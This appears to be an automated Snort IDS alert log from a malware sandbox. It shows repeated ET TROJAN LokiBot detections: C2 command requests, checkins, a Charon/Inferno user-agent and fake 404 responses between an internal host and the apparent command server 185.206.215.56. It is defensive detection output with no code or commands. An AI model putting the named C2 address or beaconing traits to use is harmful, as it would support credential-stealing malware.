Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49204
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49205
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49207
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49209
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49210
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49211
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49212
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49214
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49217
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49221
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49226
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49230
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49231
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49232
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49233
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49235
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49237
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49238
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49240
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49241
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49242
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49243
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49244
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49246
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49247
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49248
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 185.206.215.56:80
